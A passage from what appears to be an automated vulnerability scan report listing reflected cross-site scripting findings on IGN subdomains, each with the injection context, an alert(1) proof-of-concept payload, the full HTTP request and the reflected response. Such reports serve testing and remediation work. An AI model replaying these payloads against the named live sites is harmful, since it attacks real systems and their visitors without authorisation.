<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>PC Game Reviews, P ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/index/features.html?1d013"-alert(1)-"443171ee2b9=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.336. http://pc.ign.com/index/games.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/games.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7dda"-alert(1)-"d40ae7fcb0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/games.html?f7dda"-alert(1)-"d40ae7fcb0d=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>All PC Games - Com ...[SNIP]... f(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/index/games.html?f7dda"-alert(1)-"d40ae7fcb0d=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.337. http://pc.ign.com/index/games.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/games.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faee5"><script>alert(1)</script>9fb62e82277 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/games.html?faee5"><script>alert(1)</script>9fb62e82277=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>All PC Games - Com ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/index/games.html?faee5"><script>alert(1)</script>9fb62e82277=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.338. http://pc.ign.com/index/images.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/images.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ccff"-alert(1)-"3eadde19366 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/images.html?5ccff"-alert(1)-"3eadde19366=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PC: Games, Che ...[SNIP]... (typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/index/images.html?5ccff"-alert(1)-"3eadde19366=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.339. http://pc.ign.com/index/images.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/images.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6886d"><script>alert(1)</script>66db476d1bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/images.html?6886d"><script>alert(1)</script>66db476d1bf=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PC: Games, Che ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/index/images.html?6886d"><script>alert(1)</script>66db476d1bf=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.340. http://pc.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a5c"><script>alert(1)</script>f80a7fe56bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/latest-updates.html?56a5c"><script>alert(1)</script>f80a7fe56bd=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/index/latest-updates.html?56a5c"><script>alert(1)</script>f80a7fe56bd=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.341. http://pc.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/latest-updates.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d082b"-alert(1)-"7e9ec9474ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/latest-updates.html?d082b"-alert(1)-"7e9ec9474ab=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 249ec"-alert(1)-"f01e33a980f was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/latest-updates.html?types=all249ec"-alert(1)-"f01e33a980f HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into an HTML comment. The payload e31ad--><script>alert(1)</script>ea44906b49 was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index/latest-updates.html?types=alle31ad--><script>alert(1)</script>ea44906b49 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the types request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aee00"><script>alert(1)</script>a5488f5fe22 was submitted in the types parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/latest-updates.html?types=allaee00"><script>alert(1)</script>a5488f5fe22 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/index/latest-updates.html?types=allaee00"><script>alert(1)</script>a5488f5fe22&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.345. http://pc.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4af53"><script>alert(1)</script>a5f4e0d2a13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/news.html?4af53"><script>alert(1)</script>a5f4e0d2a13=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PC: Games, Che ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/index/news.html?4af53"><script>alert(1)</script>a5f4e0d2a13=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.346. http://pc.ign.com/index/news.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/news.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdc0f"-alert(1)-"c26a5909f3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/news.html?cdc0f"-alert(1)-"c26a5909f3d=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PC: Games, Che ...[SNIP]... if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/index/news.html?cdc0f"-alert(1)-"c26a5909f3d=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.347. http://pc.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/previews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a6ec"-alert(1)-"d9abf3034d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/previews.html?2a6ec"-alert(1)-"d9abf3034d5=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PC: Games, Che ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/index/previews.html?2a6ec"-alert(1)-"d9abf3034d5=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.348. http://pc.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/previews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db80"><script>alert(1)</script>2301c3d1443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/previews.html?3db80"><script>alert(1)</script>2301c3d1443=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PC: Games, Che ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/index/previews.html?3db80"><script>alert(1)</script>2301c3d1443=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.349. http://pc.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33cbd"><script>alert(1)</script>843c3a55b21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/reviews.html?33cbd"><script>alert(1)</script>843c3a55b21=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PC Game Review ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/index/reviews.html?33cbd"><script>alert(1)</script>843c3a55b21=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.350. http://pc.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffe48"-alert(1)-"eac3036dcd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/reviews.html?ffe48"-alert(1)-"eac3036dcd9=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PC Game Review ...[SNIP]... typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/index/reviews.html?ffe48"-alert(1)-"eac3036dcd9=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.351. http://pc.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/upcoming.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92006"><script>alert(1)</script>23455e7bb7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/upcoming.html?92006"><script>alert(1)</script>23455e7bb7c=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PC Games, The ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/index/upcoming.html?92006"><script>alert(1)</script>23455e7bb7c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.352. http://pc.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/upcoming.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bea2"-alert(1)-"86d750ec0d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/upcoming.html?7bea2"-alert(1)-"86d750ec0d0=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>New PC Games, The ...[SNIP]... ypeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/index/upcoming.html?7bea2"-alert(1)-"86d750ec0d0=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.353. http://pc.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/videos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21c11"-alert(1)-"bfc60e24961 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/videos.html?21c11"-alert(1)-"bfc60e24961=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PC: Games, Che ...[SNIP]... (typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/index/videos.html?21c11"-alert(1)-"bfc60e24961=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.354. http://pc.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/index/videos.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 581b0"><script>alert(1)</script>282763605b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/videos.html?581b0"><script>alert(1)</script>282763605b8=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN PC: Games, Che ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/index/videos.html?581b0"><script>alert(1)</script>282763605b8=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.355. http://pc.ign.com/objects/001/001317.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/objects/001/001317.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c00df"-alert(1)-"196d094f1ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /objects/001/001317.html?c00df"-alert(1)-"196d094f1ee=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Need For Spee ...[SNIP]... f _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://pc.ign.com/objects/001/001317.html?c00df"-alert(1)-"196d094f1ee=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.356. http://pc.ign.com/objects/001/001317.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pc.ign.com
Path:
/objects/001/001317.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b53e"><script>alert(1)</script>1a838cec5a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /objects/001/001317.html?5b53e"><script>alert(1)</script>1a838cec5a8=1 HTTP/1.1 Host: pc.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Need For Spee ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://pc.ign.com/objects/001/001317.html?5b53e"><script>alert(1)</script>1a838cec5a8=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.357. http://ps2.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps2.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b334"><script>alert(1)</script>ef0510eb206 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2b334"><script>alert(1)</script>ef0510eb206=1 HTTP/1.1 Host: ps2.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Sony PlayStation 2 ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ps2.ign.com/?2b334"><script>alert(1)</script>ef0510eb206=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.358. http://ps2.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps2.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73208"-alert(1)-"d5a196024e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?73208"-alert(1)-"d5a196024e3=1 HTTP/1.1 Host: ps2.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Sony PlayStation 2 ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://ps2.ign.com/?73208"-alert(1)-"d5a196024e3=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.359. http://ps3.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ps3.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb8f4"><script>alert(1)</script>f95cd206ad4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
